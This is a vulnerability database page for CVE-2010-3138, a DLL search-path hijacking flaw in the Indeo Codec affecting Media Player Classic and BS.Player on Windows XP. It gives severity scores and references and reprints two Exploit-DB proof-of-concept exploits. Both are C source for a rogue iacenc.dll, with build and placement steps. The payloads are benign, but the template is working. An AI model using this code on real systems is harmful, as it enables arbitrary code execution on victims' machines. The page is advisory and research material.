CVE-2010-3138 : Detail

CVE-2010-3138

95.76%V3
Network
2010-08-27
16h10 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Untrusted search path vulnerability in the Indeo Codec in iac25_32.ax in Microsoft Windows XP SP3 allows local users to gain privileges via a Trojan horse iacenc.dll file in the current working directory, as demonstrated by access through BS.Player or Media Player Classic to a directory that contains a .avi, .mka, .ra, or .ram file, aka "Indeo Codec Insecure Library Loading Vulnerability." NOTE: some of these details are obtained from third party information.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 14765

Publication date : 2010-08-24 22h00 +00:00
Author : Encrypt3d.M!nd
EDB Verified : No

/* Mediaplayer Classic 1.3.2189.0 Dll Hijack Exploit By: Encrypt3d.M!nd Date: 25\8\2010 Download: http://mpc-hc.sourceforge.net/ Details: Compile the following code and rename it to iacenc.dll and place file with one of the affected types in the same directory of the dll Affected types: m2ts, m2t, flv, hdmov, 3gpp,3gp, mpeg, mp4v, mkv, m2v,rm , ram (i guess all file types that mpc supports are affected) Code :(used the one from this advisory:http://www.exploit-db.com/exploits/14758/): */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void hook_startup() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; } // POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14765.zip (mpc-poc.zip)
Exploit Database EDB-ID : 14788

Publication date : 2010-08-24 22h00 +00:00
Author : LiquidWorm
EDB Verified : Yes

/* Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit Vendor: Gabest Product Web Page: http://sourceforge.net/projects/guliverkli Affected Version: 6.4.9.1 (revision 73) Summary: Media Player Classic (MPC) is a compact media player for 32-bit Microsoft Windows. The application mimics the look and feel of the old, lightweight Windows Media Player 6.4 but integrates most options and features found in modern media players. It and its forks are standard media players in the K-Lite Codec Pack and the Combined Community Codec Pack. Desc: Media Player Classic suffers from a dll hijacking vulnerability that enables the attacker to execute arbitrary code on a local level. The vulnerable extensions are .mka, .ra and .ram thru iacenc.dll library. ---- gcc -shared -o iacenc.dll mplayerc.c Compile and rename to iacenc.dll, create a file test.mka or any of the above vulnerable extensions and put both files in same dir and execute. ---- Tested on Microsoft Windows XP Professional SP3 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk 25.08.2010 */ #include <windows.h> BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_mll(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_mll() { MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK); }

Products Mentioned

Configuraton 0

Microsoft>>Windows_media_player >> Version *

Microsoft>>Windows_xp >> Version *

Configuraton 0

Bsplayer>>Bs.player >> Version *

    References

    http://www.us-cert.gov/cas/techalerts/TA12-045A.html
    Tags : third-party-advisory, x_refsource_CERT
    http://www.exploit-db.com/exploits/14765
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.vupen.com/english/advisories/2010/2190
    Tags : vdb-entry, x_refsource_VUPEN
    http://osvdb.org/67588
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.exploit-db.com/exploits/14788
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://secunia.com/advisories/41114
    Tags : third-party-advisory, x_refsource_SECUNIA